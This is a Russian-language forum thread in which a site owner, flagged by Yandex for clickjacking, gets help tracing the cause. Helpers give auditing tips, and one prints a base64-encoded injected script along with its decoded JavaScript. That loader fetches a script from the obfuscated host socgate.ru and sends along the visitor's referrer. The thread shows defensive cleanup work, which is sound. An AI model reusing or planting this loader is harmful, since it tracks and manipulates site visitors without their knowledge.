Как найти код кликджекинга на сайте?

онлайн консультант теоретически вполне подходит под определение кликджекинга. данные о профиле пользователя в соцсетях собирает? да. ну и остальное до кучи. это как вариант.

Если не ошибаюсь, алгоритм яндекса банит за обращение к профилям соцсетей. Крупные онлайн-чаты этим не балуются.

Возможно, дело в скрипте, который расположен в самом начале страницы. Влез без очереди вперёд всех.:) Подключает скрипт с сайта mod.calltouch.ru (Сервис аналитики и управления интернет-рекламой на базе коллтрекинга) и заодно отправляет туда данные (как минимум, куки) пользователей Вашего сайта. Яндекс может отнестись к этому с подозрением.

Колтач стоит с 2013 года. Сервис известный, лидер своей ниши, думаю бан яндекса невероятен по этой причине.

Это не означает, что скрипты Яндекса тоже "стоят" с 2013 года. Наверняка алгоритмы обновляются, и то, что ранее какой-то скрипт не вызывал подозрений - не означает, что и сейчас этот скрипт не вызывает подозрений.

С таким подходом "невероятен" вы никогда не найдете причин. Во-первых, снимаете ВСЕ левые скрипты, во-вторых - проверяете все файлы и всю базу данных, выгребая абсолютно все ссылки и анализируете их. В третьих - напишите в саппорт Яндекса, иногда везет и они снисходят. В последнее из таких обращений владелице сайта не поленились ТОЧНО указать данные, которые увидел Яндекс, и соответственно найти оказалось делом ровно трех минут.

Кстати, те ссылки кликджекинга на сайте находились годы, но раньше Яндекс их пропускал, а потом алгоритмы улучшились и они его нашли. Точнее, конечно же, не "нашли", а "распознали" как вредоносные. Рабочие ли они были или нет - даже не разбирались, грохнули и дело в шляпе. Метка пропала буквально через несколько дней, что есть понижение и кликджекинг.

Не обижайтесь, но если хотите найти причину - откажитесь от слов "так не бывает", "невозможно", "я точно уверен". Придется проверять все. Начиная с меньшего потенциального круга и далее по большему. Ссылки - не фантомы (если конечно не ошибка Яши, так тоже бывает) - их можно найти. Любой код сторонний - потенциальная угроза. Кхм.. а иногда и не сторонний )

Спасибо за развернутый ответ, в Яндекс написал 2 дня назад.

Тогда только изучать, как и писал выше. Начните с полного анализа кода и БД. Учитывайте, что ссылки могут быть зашифрованы, к примеру в base64 и просто поиск по http не эффективен. Если ничего не будет найдено - снимайте абсолютно все сторонние JS и коды, изучайте время изменения ваших файлов, JS, htaccess.. Если не ошибка Яндекса - то источник будет найден. Либо могли сторонние неожиданно пошалить, либо Яндекс нашел что-то, что раньше пропускал.

Вот это у вас на сайте обнаружилось:

ZnVuY3Rpb24gaGRrKGljLCB1KXsKc2V0VGltZW91dChmdW5jdGlvbigpeyB2YXIgZGJkID0gZG9jdW1lbnQ7IGYgPSBkYmQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ3NjcmlwdCcpWzBdOwpzID0gZGJkLmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOyBoID0gZXNjYXBlKGRiZC5yZWZlcnJlcik7IHMudHlwZSA9ICd0ZXgnKyd0L2phJysndmFzYycrJ3InKydpcHQnOwpzLmFzeW5jID0gdHJ1ZTsgcy5zcmMgPXUrIj9pZD0iK2ljKyImaD0iK2grIiZyPSIrIiI7IGYucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUocywgZik7IH0sIDIwKTt9CmhkaygnODZkNDg1ZDQxZDhjZDk5MDQ4NjcwNjcnLCcvL3MnKydvY2dhJysndCcrJ2UucnUnKycvc3RyJysnYWMnKydrLycpOyAvKiBoZGs6YTBjYWZlZjVlY2RlYjZmMmJkNjI4ZWJhYmExZjZkNDIgKi8=

И вот так это выглядит по человечески:

function hdk(ic, u){

setTimeout(function(){ var dbd = document; f = dbd.getElementsByTagName('script')[0];

s = dbd.createElement('script'); h = escape(dbd.referrer); s.type = 'tex'+'t/ja'+'vasc'+'r'+'ipt';

s.async = true; s.src =u+"?id="+ic+"&h="+h+"&r="+""; f.parentNode.insertBefore(s, f); }, 20);}

hdk('86d485d41d8cd9904867067','//s'+'ocga'+'t'+'e.ru'+'/str'+'ac'+'k/'); /* hdk:a0cafef5ecdeb6f2bd628ebaba1f6d42 */

А это, собственно, url: socgate.ru Зеркало: socgate.com

Статья на Хабре

Сидит тут. А может и ещё где есть.

Большое спасибо! Из 50 страниц код кликджекинга оказался только на одной, поэтому сложно было найти!

Как я и сказал - может быть зашифровано. 🍻

Сделали всю работу за ТС ))